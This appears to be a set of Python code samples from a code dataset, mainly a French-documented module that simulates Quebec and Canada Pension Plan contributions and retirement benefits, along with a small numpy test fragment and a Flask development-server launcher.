test_array = numpy.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], dtype=numpy.float)
# Normalization kind == 0 -> Scale to 0..1
expected_array = test_array / test_array.max()
normalized_array = normalize(test_array)
assert numpy.all(numpy.isclose(expected_array, normalized_array))
# Normalization kind == 1 -> Divide by mean value of array
expected_array = test_array / test_array.mean()
normalized_array = normalize(test_array, kind_of_normalization=1)
assert numpy.all(numpy.isclose(expected_array, normalized_array))
def test_reshape_array_to_image(self):
test_array = numpy.array([i for i in range(0, 100)])
# Test reshape for no roi size
toolbox_image = reshape_array_to_image(test_array, 10, 1)
assert toolbox_image.shape == (10, 10)
# test if content of array is as expected
for i in range(0, 10):
for j in range(0, 10):
assert toolbox_image[i, j] == test_array[i * 10 + j]
# Test reshape for roi size of two
toolbox_image = reshape_array_to_image(test_array, 10, 2)
assert toolbox_image.shape == (5, 20)
for i in range(0, 5):
for j in range(0, 20):
assert toolbox_image[i, j] == test_array[i * 20 + j]
|
StarcoderdataPython
|
1720708
|
<reponame>shawwn/cpython
from . import basic, basic2
|
StarcoderdataPython
|
3294283
|
<gh_stars>0
"""
This script runs the FlaskDeepServer application using a development server.
"""
from os import environ
from FlaskDeepServer import app
import logging
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename='log.log',
filemode='w')
app.run('0.0.0.0', 8888)
|
StarcoderdataPython
|
3339315
|
import numpy as np
import operator
from enum import Enum
import pandas as pd
from os import path
class record:
"""
Cette classe permet d'enregistrer une année d'information.
Les instances de cette classe sont regroupées dans la liste *account.history*. Habituellement l'utilisateur utilisera la fonction de méthode *MakeContrib* de la classe *account* (voir ci-dessous) pour créer des entrées.
Parameters
__________
year : int
année de l'entrée
earn : float
gains admissibles
contrib : float
cotisation au régime de base
contrib_s1 : float
cotisation au régime supplémentaire 1 (en lien avec la hausse du taux de remplacement)
contrib_s2 : float
cotisation au régime supplémentaire 2 (en lien avec la hausse du salaire admissible à 114% du MGA pré-réforme)
contrib_aut : float
cotisation au régime de base pour les revenus de travail autonome
contrib_aut_s1 : float
cotisation au régime supplémentaire 1 (en lien avec la hausse du taux de remplacement) pour les revenus de travail autonome
contrib_aut_s2 : float
cotisation au régime supplémentaire 2 (en lien avec la hausse du salaire admissible à 114% du MGA pré-réforme) pour les revenus de travail autonome
kids : boolean
présence d'enfants de moins de 7 ans (True seulement pour la personne admissible à l'exemption pour soins aux enfants en bas âge); défaut=False
disab : boolean
rente d'invalidité (non modélisée actuellement) si True, rente de retraite si False; défaut=False
"""
def __init__(self,year,earn=0.0,contrib=0.0, contrib_s1=0.0, contrib_s2=0.0,
contrib_aut=0,contrib_aut_s1=0,contrib_aut_s2=0,kids=False,disab=False):
self.year = year
self.earn = earn
self.contrib = contrib
self.contrib_s1 = contrib_s1
self.contrib_s2 = contrib_s2
self.contrib_aut = contrib_aut
self.contrib_aut_s1 = contrib_aut_s1
self.contrib_aut_s2 = contrib_aut_s2
self.kids = kids
self.disab = disab
class rules:
"""
Classe contenant les règles du RPC et du RRQ.
Une instance de cette classe charge soit les pamamètres pour le RRQ (qpp=True) ou pour le RPC (qpp=False). Les paramètres jusqu'en 2025 sont dans params/qpp_history.xlsx et params/cpp_history.xlsx. Passé 2025 les différentes fonctions de méthodes renvoient soit la valeur de 2025 ou la valeur actualisée, selon le paramètre. En général, pour accéder à un paramètre pour une année donnée il suffit d'appeler la fonction de méthode *rules.<param>(year)*.
On note que tous les taux de cotisation sont modélisés séparément, car les différentes composantes des cotisations sont traitées de façon différente sur le plan fiscal.
Parameters
__________
qpp : boolean
True pour charger les paramètres du RRQ, False pour charger ceux du RPC; défaut=True
Attributes
__________
cpi : float
taux annuel d'indexation des prestations
wgr : float
taux annuel d'augmentation du MGA
lastyear : int
lastyear + 1: année à partir de laquelle *rules.cpi* et *rules.wgr* sont utilisés à la place des valeurs du fichier de paramètres
self.indexation : float(NxN)
tableau pré-calculé d'indexation des prestations de 1966 à 2100
"""
def __init__(self,qpp=False):
bnames = ['byear','era','nra','lra']
ynames = ['year','ympe','exempt','worker','employer','selfemp','ca','arf','drc','nympe','reprate',
'droprate','pu1','pu2','pu3','pu4','survmax60', 'survmax65', 'survage1', 'survage2',
'survrate1', 'survrate2','era','nra','lra','supp','disab_rate','disab_base','cola',
'ympe_s2','worker_s1','employer_s1','worker_s2','employer_s2','selfemp_s1','selfemp_s2',
'reprate_s1', 'reprate_s2','supp_s1','supp_s2']
self.qpp = qpp
self.start = 1966
self.start_s1= 2019
self.start_s2= 2024
params = path.join(path.dirname(__file__), 'params')
if (self.qpp==True):
self.yrspars = pd.read_excel(params+'/qpp_history.xlsx',names=ynames)
else :
#No ca column in cpp
for i,name in enumerate(ynames):
if name == "ca":
ynames.pop(i)
self.yrspars = pd.read_excel(params+'/cpp_history.xlsx',names=ynames)
self.stop = np.max(self.yrspars['year'].values)
self.yrspars = self.yrspars.set_index('year')
self.cpi = 0.02
self.wgr = 0.03
self.lastyear = 2021
self.indexation = np.ones((2100-1966,2100-1966))
ones_lower = np.tril(self.indexation)
for y in range(2100-1966):
self.indexation[:,y] = self.indexation[:,y] + self.cola(1966+y)
self.indexation = np.cumprod((np.triu(self.indexation)-np.diag(np.diag(self.indexation))+ones_lower), axis=1)
def ympe(self,year):
"""
MGA de base pour une année donnée.
Par défaut, indexé à *wgr* pour les années après 2025.
Parameters
__________
year : int
année du paramètre
Return
______
float
Montant du MGA de base.
"""
if (year>self.lastyear):
value = self.yrspars.loc[self.lastyear,'ympe']
value *= (1.0+self.wgr)**(year-self.lastyear)
else:
value = self.yrspars.loc[year,'ympe']
return value
def ympe_s2(self,year):
"""
Montant du MGA pour le régime supplémentaire pour une année donnée (0 avant 2024, indexé à *wgr* après 2025).
Parameters
__________
year : int
année du paramètre
Return
______
float
Montant du MGA pour le régime supplémentaire.
"""
value = self.ympe(year)
value *= self.yrspars.loc[min(year,self.stop),'ympe_s2']
return value
def exempt(self,year):
"""
Montant de l'exemption sur les gains cotisables.
Après 2025, maintenue fixe à sa valeur nominale de 2025.
Parameters
__________
year : int
année du paramètre
Return
______
float
Montant de l'exemption.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'exempt']
else :
value = self.yrspars.loc[year,'exempt']
return value
def worktax(self,year):
"""
Taux de cotisation de l'employé au régime de base. Fixe après 2025.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de cotisation.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'worker']
else :
value = self.yrspars.loc[year,'worker']
return value
def worktax_s1(self,year):
"""
Taux de cotisation de l'employé au régime supplémentaire 1.
Fixe après 2025.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de cotisation.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'worker_s1']
else :
value = self.yrspars.loc[year,'worker_s1']
return value
def worktax_s2(self,year):
"""
Taux de cotisation de l'employé au régime supplémentaire 1.
Fixe après 2025.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de cotisation.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'worker_s2']
else :
value = self.yrspars.loc[year,'worker_s2']
return value
def empltax(self,year):
"""
Taux de cotisation de l'employeur au régime de base.
Fixe après 2025.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de cotisation.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'employer']
else :
value = self.yrspars.loc[year,'employer']
return value
def empltax_s1(self,year):
"""
Taux de cotisation de l'employeur au régime supplémentaire 1.
Fixe après 2025.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de cotisation.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'employer_s1']
else :
value = self.yrspars.loc[year,'employer_s1']
return value
def empltax_s2(self,year):
"""
Taux de cotisation de l'employeur au régime supplémentaire 2.
Fixe après 2025.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de cotisation.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'employer_s2']
else :
value = self.yrspars.loc[year,'employer_s2']
return value
# def tax(self,year):
# """
# Taux de cotisation combiné de l'employeur et de l'employé au régime de base.
#
# Parameters
# __________
# year : int
# année du paramètre
# Return
# ______
# float
# Taux de cotisation.
# """
# return self.worktax(year)+self.empltax(year)
# def tax_s1(self,year):
# """
# Taux de cotisation combiné de l'employeur et de l'employé au régime supplémentaire 1.
#
# Parameters
# __________
# year : int
# année du paramètre
# Return
# ______
# float
# Taux de cotisation.
# """
# return self.worktax_s1(year)+self.empltax_s1(year)
# def tax_s2(self,year):
# """
# Taux de cotisation combiné de l'employeur et de l'employé au régime supplémentaire 2.
#
# Parameters
# __________
# year : int
# année du paramètre
# Return
# ______
# float
# Taux de cotisation.
# """
# return self.worktax_s2(year)+self.empltax_s2(year)
def selftax(self,year):
"""
Taux de cotisation sur revenun de travail autonome au régime de base.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de cotisation.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'selfemp']
else :
value = self.yrspars.loc[year,'selfemp']
return value
def selftax_s1(self,year):
"""
Taux de cotisation sur revenun de travail autonome au régime supplémentaire 1.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de cotisation.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'selfemp_s1']
else :
value = self.yrspars.loc[year,'selfemp_s1']
return value
def selftax_s2(self,year):
"""
Taux de cotisation sur revenun de travail autonome au régime supplémentaire 2.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de cotisation.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'selfemp_s2']
else :
value = self.yrspars.loc[year,'selfemp_s2']
return value
def ca(self,year):
"""
Dans le RRQ, facteur d'ajustement en fonction du revenu de la réduction pour rente hâtive (débutant avant 65 ans).
Parameters
__________
year : int
année du paramètre
Return
______
float
Facteur d'ajustement.
"""
if self.qpp:
if (year > self.stop):
value = self.yrspars.loc[self.stop,'ca']
else :
value = self.yrspars.loc[year,'ca']
else:
value = 0.0
return value
def arf(self,year):
"""
Taux de réduction des prestations pour un début avant 65 ans.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de réduction.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'arf']
else :
value = self.yrspars.loc[year,'arf']
return value
def drc(self,year):
"""
Taux de bonification des prestations pour un début après 65 ans.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de bonification.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'drc']
else :
value = self.yrspars.loc[year,'drc']
return value
def nympe(self,year):
"""
Nombre d'années utilisé pour calculer le MGA moyen.
Parameters
__________
year : int
année du paramètre
Return
______
float
Nombre d'années.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'nympe']
else :
value = self.yrspars.loc[year,'nympe']
return value
def reprate(self,year):
"""
Taux de remplacement du régime de base.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de remplacement.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'reprate']
else :
value = self.yrspars.loc[year,'reprate']
return value
def reprate_s1(self,year):
"""
Taux de remplacement du régime supplémentaire 1.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de remplacement.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'reprate_s1']
else :
value = self.yrspars.loc[year,'reprate_s1']
return value
def reprate_s2(self,year):
"""
Taux de remplacement du régime supplémentaire 2.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de remplacement.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'reprate_s2']
else :
value = self.yrspars.loc[year,'reprate_s2']
return value
def droprate(self,year):
"""
Proportion d'années non prises en compte dans le calcul de la rente de retraite.
Parameters
__________
year : int
année du paramètre
Return
______
float
Proportion d'années.
"""
if (year > self.stop):
value = self.yrspars.loc[self.stop,'droprate']
else :
value = self.yrspars.loc[year,'droprate']
return value
# def pu1(self,year):
# """
# Parameters
# __________
# year : int
# année du paramètre
# Return
# ______
# float
# NE PAS UTILISER
# """
# if year > self.stop :
# yr = self.stop
# else:
# yr = year
# return self.yrspars.loc[yr,'pu1']
# def pu2(self,year):
# """
# Return
# ______
# float
# NE PAS UTILISER
# """
# if year > self.stop :
# yr = self.stop
# else:
# yr = year
# return self.yrspars.loc[yr,'pu2']
# def pu3(self,year):
# """
# Return
# ______
# float
# NE PAS UTILISER
# """
# if year > self.stop :
# yr = self.stop
# else:
# yr = year
# return self.yrspars.loc[yr,'pu3']
# def pu4(self,year):
# """
# Return
# ______
# float
# NE PAS UTILISER
# """
# if year > self.stop :
# yr = self.stop
# else:
# yr = year
# return self.yrspars.loc[yr,'pu4']
def supp(self,year):
"""
Taux de bonification post-retraite pour les bénéficiaires qui continuent de travailler tout en recevant une prestation de retraite (portion régime de base).
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de bonification.
"""
if year > self.stop :
yr = self.stop
else:
yr = year
return self.yrspars.loc[yr,'supp']
def supp_s1(self,year):
"""
Taux de bonification post-retraite pour les bénéficiaires qui continuent de travailler tout en recevant une prestation de retraite (portion régime supplémentaire 1).
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de bonification.
"""
if year > self.stop :
yr = self.stop
else:
yr = year
return self.yrspars.loc[yr,'supp_s1']
def supp_s2(self,year):
"""
Taux de bonification post-retraite pour les bénéficiaires qui continuent de travailler tout en recevant une prestation de retraite (portion régime supplémentaire 2).
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux de bonification.
"""
if year > self.stop :
yr = self.stop
else:
yr = year
return self.yrspars.loc[yr,'supp_s2']
# def survmax60(self,year):
# if year > self.stop :
# yr = self.stop
# else:
# yr = year
# return self.yrspars.loc[yr,'survmax60']
# def survmax65(self,year):
# if year > self.stop :
# yr = self.stop
# else:
# yr = year
# return self.yrspars.loc[yr,'survmax65']
# def survage1(self,year):
# if year > self.stop :
# yr = self.stop
# else:
# yr = year
# return self.yrspars.loc[yr,'survage1']
# def survage2(self,year):
# if year > self.stop :
# yr = self.stop
# else:
# yr = year
# return self.yrspars.loc[yr,'survage2']
# def survrate1(self,year):
# if year > self.stop :
# yr = self.stop
# else:
# yr = year
# return self.yrspars.loc[yr,'survrate1']
# def survrate2(self,year):
# if year > self.stop :
# yr = self.stop
# else:
# yr = year
# return self.yrspars.loc[yr,'survrate2']
def era(self,year):
"""
Âge minimum pour commencer à recevoir la rente de retraite (early retirement age).
Parameters
__________
year : int
année du paramètre
Return
______
float
Âge minimum.
"""
if year > self.stop :
yr = self.stop
else:
yr = year
return self.yrspars.loc[yr,'era']
def nra(self,year):
"""
Âge normal de la retraite.
Parameters
__________
year : int
année du paramètre
Return
______
float
Âge normal.
"""
if year > self.stop :
yr = self.stop
else:
yr = year
return self.yrspars.loc[yr,'nra']
def disab_rate(self,year):
"""
Taux pour prestation d'invalidité.
N'est pas utilisé actuellement.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux pour prestation d'invalidité.
"""
if year > self.stop :
yr = self.stop
else:
yr = year
return self.yrspars.loc[yr,'disab_rate']
def disab_base(self,year):
"""
Montant pour prestation d'invalidité.
N'est pas utilisé actuellement.
Parameters
__________
year : int
année du paramètre
Return
______
float
Montant de prestation d'invalidité.
"""
if year > self.stop :
yr = self.stop
else:
yr = year
return self.yrspars.loc[yr,'disab_base']
def cola(self,year):
"""
Taux annuel d'indexation des prestations une fois que celles-ci ont débuté.
Parameters
__________
year : int
année du paramètre
Return
______
float
Taux d'indexation.
"""
if year > self.stop :
value = self.cpi
else:
value = self.yrspars.loc[year,'cola']
return value
def gIndexation(self,start,stop):
"""
Calcule l'indexation des prestations pour une période définie par (start,stop).
Parameters
__________
start : int
première année d'indexation
stop : int
dernière année d'indexation
Return
______
float
Indexation.
"""
return self.indexation[start-self.start][stop-self.start]
def max_benefit(self,year):
"""
Calcul de la prestation maximale possible pour une année donnée de début des prestations (moyenne du MGA des 5 années précédentes)
Utilisé aux fins du calcul de la réduction ajustée en fonction du revenu dans le RRQ (pour les individus débutant hâtivement leur rente de retraite).
Parameters
__________
year : int
année du paramètre
Return
______
float
Prestation maximale.
"""
return np.mean([self.ympe(x) for x in [max(year-x,1966) for x in range(5)]])*self.reprate(year)/12
# def chgpar(self,name,y0,y1,value):
# """
# Ne pas utiliser
# """
# if (name in self.yrspars.columns):
# for i in range(y0,y1+1):
# self.yrspars.loc[i,name] = value
# else :
# for i in range(y0,y1+1):
# pass
# #self.byrpars.loc[i,name] = value
class account:
"""
Classe principale regroupant l'information sur un individu et comprenant les fonctions de calcul.
Principale interface avec le simulateur. Chaque individu simulé doit avoir une instance de cette classe.
Parameters
__________
byear : int
année de naissance
rules : rules
une instance de la classe rules
"""
def __init__(self,byear,rules=None):
self.byear = byear
self.claimage = None
self.history = [record(yr) for yr in range(self.byear+18,self.byear+70,1)]
self.ncontrib = 0
self.ncontrib_s1 = 0
self.ncontrib_s2 = 0
self.ampe = 0.0
self.ampe_s1 = 0.0
self.ampe_s2 =0.0
self.receiving = False
self.rules = rules
self.benefit = 0.0
self.benefit_s1 = 0.0
self.benefit_s2 = 0.0
self.prb = [0 for x in range(11)]
self.prb_s1 = [0 for x in range(11)]
self.prb_s2 = [0 for x in range(11)]
self.cqppcontrib = 0.0
def MakeContrib(self,year,earn,earn_aut=0,kids=False):
"""
Ajoute une année de cotisation (une instance de la classe *record* dans la liste des années de cotisation).
Parameters
__________
year : int
année de cotisation
earn : float
revenu d'emploi cotisable
earn_aut : float
revenu de travail autonome cotisable; défaut=0
kids : boolean
présence d'enfants de moins de 7 ans (True seulement pour la personne admissible à l'exemption pour soins aux enfants en bas âge); défaut=False
"""
if year>=self.rules.start:
if earn>=self.rules.ympe(year):
taxable = self.rules.ympe(year)-self.rules.exempt(year)
taxable_aut = 0
elif (earn+earn_aut) >=self.rules.ympe(year):
if earn >= self.rules.exempt(year):
taxable = earn-self.rules.exempt(year)
taxable_aut = self.rules.ympe(year)-earn
else :
taxable = 0
taxable_aut = self.rules.ympe(year) - self.rules.exempt(year)
else:
taxable = earn
taxable_aut = earn_aut
if taxable >=self.rules.exempt(year):
taxable -= self.rules.exempt(year)
elif taxable + taxable_aut >=self.rules.exempt(year):
taxable_aut -= (self.rules.exempt(year)-taxable)
taxable = 0.0
else:
taxable = 0.0
taxable_aut = 0.0
contrib = self.rules.worktax(year) * taxable
contrib_aut = self.rules.worktax(year) * taxable_aut * 2
contrib_s1 = self.rules.worktax_s1(year) * taxable
contrib_aut_s1 = self.rules.worktax_s1(year) * taxable_aut * 2
taxable_s2 = np.min( [np.max([earn-self.rules.ympe(year),0.0]) , (self.rules.ympe_s2(year)-self.rules.ympe(year))])
if taxable_s2>0.0:
if taxable_s2<(self.rules.ympe_s2(year)-self.rules.ympe(year)):
taxable_aut_s2 = np.min([taxable_aut,(self.rules.ympe_s2(year)-self.rules.ympe(year))-taxable_s2])
else :
taxable_aut_s2 = 0.0
else:
taxable_aut_s2 = 0.0
contrib_s2 = self.rules.worktax_s2(year) * taxable_s2
contrib_aut_s2 = self.rules.worktax_s2(year) * taxable_aut_s2 * 2
self.cqppcontrib = contrib +contrib_s2
index = self.gAge(year)-18
self.history[index]= record(year,earn=earn+earn_aut,contrib = contrib,contrib_s1 = contrib_s1,contrib_s2=contrib_s2,
contrib_aut = contrib_aut,contrib_aut_s1 = contrib_aut_s1,contrib_aut_s2=contrib_aut_s2,kids=kids)
if self.claimage!=None:
self.CalcPRB(year,taxable,taxable_s2,earn)
def ClaimCPP(self,year):
"""
Effectue la demande de débuter les prestations et appelle les fonctions *CalcAMPE* et *CalcBenefit* (voir plus bas).
Parameters
__________
year : int
année de cotisation
"""
currage = self.gAge(year)
if self.claimage!=None:
print('already claimed at ',self.claimage,' ...')
else :
if currage >= self.rules.era(year):
self.ncontrib = np.min([currage - 18,year-1966])
self.ncontrib_s1 = np.max([np.min([currage - 18,year-self.rules.start_s1]),0])
self.ncontrib_s2 = np.max([np.min([currage - 18,year-self.rules.start_s2]),0])
self.claimage = currage
self.receiving = True
self.CalcAMPE(year)
self.CalcBenefit(year)
else :
print('not yet eligible...')
def gAge(self,year):
"""
Retourne l'âge de l'individu dans une année donnée.
Parameters
__________
year : int
année
Return
______
int
Âge.
"""
return year - self.byear
def gYear(self,age):
"""
Retourne l'année pour un âge donné.
Parameters
__________
year : int
Âge
Return
______
int
Année.
"""
return self.byear + age
def CalcAMPE(self,year):
"""
Calcule la moyenne des gains ouvrant droit à pension, en proportion du MGA de chaque année, en tenant des années d'exclusion.
Parameters
__________
year : int
année de début des prestations
"""
# parameters
yr18 = np.max([self.gYear(18),self.rules.start])
yr70 = np.min([self.gYear(70),year])
nyrs = yr70-yr18
yr18_s2 = np.max([self.gYear(18),self.rules.start_s2])
nyrs_s2 = [np.max([(yr70-yr18_s2),0])]
index = np.max([self.gAge(1966)-18,0])
yrs = [self.history[p].year for p in range(index,index+self.ncontrib)]
yrs_s2 = [self.history[p].year for p in range(index,index+self.ncontrib_s2)]
ympe = [self.rules.ympe(i) for i in yrs]
ympe_s2 = [self.rules.ympe_s2(i) for i in yrs]
worktax_s1 = [self.rules.worktax_s1(i) for i in yrs]
exempt = [self.rules.exempt(i) for i in yrs]
kids = [self.history[p].kids for p in range(index,index+self.ncontrib)]
disab = [self.history[p].disab for p in range(index,index+self.ncontrib)]
earn = [self.history[p].earn for p in range(index,index+self.ncontrib)]
nympe = self.rules.nympe(year)
# unadjusted pensionable earnings
self.upe = [np.min([earn[i],ympe[i]]) for i in range(self.ncontrib)]
self.upe = [np.where(self.upe[i]<exempt[i],0.0,self.upe[i]) for i in range(self.ncontrib)]
#upe_s2 Need to start only in 2024
self.upe_s2 = [np.max([np.min([earn[i]-ympe[i],ympe_s2[i]-ympe[i]]),0.0]) for i in range(self.ncontrib)]
# average ympe last 5 years
avgympe = np.mean([self.rules.ympe(i) for i in range(year-nympe+1,year+1)])
# compute ape
ape = [self.upe[i]/ympe[i]*avgympe for i in range(self.ncontrib)]
ape_s1 = [self.upe[i]/ympe[i] * avgympe * worktax_s1[i]*100 for i in range(self.ncontrib)]
ape_s2 = [self.upe_s2[i]/ympe[i]*avgympe for i in range(self.ncontrib)]
# need provision for disability
ndrop = 0
dropped = np.full(self.ncontrib, False)
for i in range(self.ncontrib):
if (self.upe[i]==0.0 and disab[i]==True):
dropped[i] = True
ndrop +=1
ndrop_s1 = 0
dropped_s1 = np.full(self.ncontrib, False)
for i in range(self.ncontrib):
if year>=self.rules.start_s1 and (self.upe[i]==0.0 and disab[i]==True):
dropped_s1[i] = True
ndrop_s1 +=1
ndrop_s2 = 0
dropped_s2 = np.full(self.ncontrib, False)
for i in range(self.ncontrib):
if year>=self.rules.start_s2 and (self.upe_s2[i]==0.0 and disab[i]==True):
dropped_s2[i] = True
ndrop_s2 +=1
# dropout years for childrearing (CRD01)
ndrop = 0
dropped = np.full(self.ncontrib, False)
for i in range(self.ncontrib):
if (self.upe[i]==0.0 and kids[i]==True):
dropped[i] = True
ndrop +=1
# compute average ape
avgape = np.sum(ape)/(nyrs - ndrop)
avgape_s2 = np.sum(ape_s2)/40
# Child rearing provision (CRD02)
for i in range(self.ncontrib):
if (ape[i]<avgape and kids[i]==True):
ape[i] = 0.0
dropped[i] = True
ndrop +=1
# need add provision working past 65
# General dropout
gdrop = int(np.ceil(self.rules.droprate(year)*(self.ncontrib - ndrop)))
apef = [ape[i] for i in range(self.ncontrib) if dropped[i]==False]
ixf = np.asarray(apef).argsort()[0:gdrop]
yrsf = [yrs[i] for i in range(self.ncontrib) if dropped[i]==False]
yrstodrop = [yrsf[i] for i in ixf]
for i in range(self.ncontrib):
if (yrs[i] in yrstodrop and gdrop!=0):
ape[i] = 0
dropped[i] = True
ndrop +=1
gdrop -=1
self.ampe = (1/12)*np.sum(ape)/(nyrs - ndrop)
# Revoir indices car le code ne fait pas encore qu'il devrait faire
# par grave pour le moment car par défaut
# dgrop_s1 = 0 avant 2059
# dgrop_s2 = 0 avant 2064
gdrop_s1 = int(np.max([self.ncontrib_s1-40,0.0]))
apef_s1 = [ape_s1[i] for i in range(self.ncontrib) if dropped_s1[i]==False]
ixf_s1 = np.asarray(apef_s1).argsort()[0:gdrop_s1]
yrsf_s1 = [yrs[i] for i in range(self.ncontrib) if dropped_s1[i]==False]
yrstodrop_s1 = [yrsf_s1[i] for i in ixf_s1]
for i in range(self.ncontrib):
if (yrs[i] in yrstodrop_s1 and gdrop_s1!=0):
ape_s1[i] = 0
dropped_s1[i] = True
ndrop_s1 +=1
gdrop_s1 -=1
self.ampe_s1 = (1/12)*np.sum(ape_s1)/40
gdrop_s2 = int(np.max([self.ncontrib_s2-40,0.0]))
apef_s2 = [ape_s2[i] for i in range(self.ncontrib) if dropped_s2[i]==False]
ixf_s2 = np.asarray(apef_s2).argsort()[0:gdrop_s2]
yrsf_s2 = [yrs[i] for i in range(self.ncontrib) if dropped_s2[i]==False]
yrstodrop_s2 = [yrsf_s2[i] for i in ixf_s2]
for i in range(self.ncontrib):
if (yrs[i] in yrstodrop_s2 and gdrop_s2!=0):
ape_s2[i] = 0
dropped_s2[i] = True
ndrop_s2 +=1
gdrop_s2 -=1
self.ampe_s2 = (1/12)*np.sum(ape_s2)/40
def CalcBenefit(self,year):
"""
Calcule la prestation de retraite (régimes de base, supplémentaire 1 et supplémentaire 2), à partir de *CalcAMPE* et de nombreuses autres fonctions.
Parameters
__________
year : int
année de début des prestations
"""
if self.receiving==True:
if (self.gAge(year)==self.claimage):
nra = self.rules.nra(year)
ca = self.rules.ca(year)
arf = self.rules.arf(year)
drc = self.rules.drc(year)
age = self.gAge(year)
self.benefit = self.rules.reprate(year) * self.ampe
self.benefit_s1 = self.rules.reprate_s1(year) * self.ampe_s1
self.benefit_s2 = self.rules.reprate_s2(year) * self.ampe_s2
if (age<nra):
self.benefit *= 1.0+(arf+int(self.rules.qpp)*ca*self.benefit/self.rules.max_benefit(year))*(age-nra)
self.benefit_s1 *= 1.0+(arf+int(self.rules.qpp)*ca*self.benefit/self.rules.max_benefit(year))*(age-nra)
self.benefit_s2 *= 1.0+(arf+int(self.rules.qpp)*ca*self.benefit/self.rules.max_benefit(year))*(age-nra)
else :
self.benefit *= 1.0+drc*(age-nra)
self.benefit_s1 *= 1.0+drc*(age-nra)
self.benefit_s2 *= 1.0+drc*(age-nra)
else:
self.benefit = 0.0
self.benefit_s1 = 0.0
self.benefit_s2 = 0.0
def CalcPRB(self,year,taxable,taxable_s2,earn):
"""
Calcule la prestation post-retraite lorsqu'une cotisation a été faite après le début des prestations.
Parameters
__________
year : int
année de la cotisation
taxable : float
montant cotisable pour le régime de base et le régime supplémentaire 1
taxable_s2 : float
montant cotisable pour le régime supplémentaire 2
earn : float
gains admissibles dans l'année précédente
"""
if self.rules.qpp:
if year>=2014:
self.prb[self.gAge(year)-60+1] = (self.prb[self.gAge(year)-60]*(1+self.rules.cola(year))
+ taxable*self.rules.supp(year)/12)
self.prb_s1[self.gAge(year)-60+1] = (self.prb_s1[self.gAge(year)-60]*(1+self.rules.cola(year))+
taxable*self.rules.worktax_s1(year)*100*self.rules.supp_s1(year)/12)
self.prb_s2[self.gAge(year)-60+1] = (self.prb_s2[self.gAge(year)-60+1] +
taxable_s2*self.rules.worktax_s2(year)*100*self.rules.supp_s2(year)/12)
if self.gAge(year)<69:
for index in range(self.gAge(year)-60+2,11):
self.prb[index] = self.prb[index-1]*(1+self.rules.cola(year+index))
self.prb_s1[index] = self.prb_s1[index-1]*(1+self.rules.cola(year+index))
self.prb_s2[index] = self.prb_s2[index-1]*(1+self.rules.cola(year+index))
else:
if year>=2014 & self.gAge(year)<70:
nra = self.rules.nra(year)
arf = self.rules.arf(year)
drc = self.rules.drc(year)
age = self.gAge(year)
upe = np.min([earn,self.rules.ympe(year)])
if upe<self.rules.exempt(year) : upe = 0
#upe_s2 Need to start only in 2024
upe_s2 = np.max([np.min([earn-self.rules.ympe(year),self.rules.ympe_s2(year)-self.rules.ympe(year)]),0.0])
#PRB base
prb = upe/self.rules.ympe(year) * self.rules.ympe(year+1)*self.rules.supp(year)
# PRB S1
prb_s1 = upe/self.rules.ympe(year) * self.rules.ympe(year+1)*self.rules.worktax_s1(year)*100*self.rules.supp_s1(year)
#PRB S2
if upe_s2>0:
prb_s2 = upe_s2/(self.rules.ympe_s2(year)-self.rules.ympe(year))*(self.rules.ympe_s2(year+1)-self.rules.ympe(year+1)) * self.rules.supp_s1(year)
#Ajustment factor
if (age<nra):
self.prb[self.gAge(year)-60+1] = self.prb[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+arf*(age-nra)) * prb/12
self.prb_s1[self.gAge(year)-60+1] = self.prb_s1[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+arf*(age-nra)) * prb_s1/12
self.prb_s2[self.gAge(year)-60+1] = self.prb_s2[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+arf*(age-nra)) * prb_s2/12
else :
self.prb[self.gAge(year)-60+1] = self.prb[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+drc*(age-nra)) * prb/12
self.prb_s1[self.gAge(year)-60+1] = self.prb_s1[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+drc*(age-nra)) * prb_s1/12
self.prb_s2[self.gAge(year)-60+1] = self.prb_s2[self.gAge(year)-60]*(1+self.rules.cola(year)) + (1.0+drc*(age-nra)) * prb_s2/12
if self.gAge(year)<69:
for index in range(self.gAge(year)-60+2,11):
self.prb[index] = self.prb[index-1]*(1+self.rules.cola(year+index))
self.prb_s1[index] = self.prb_s1[index-1]*(1+self.rules.cola(year+index))
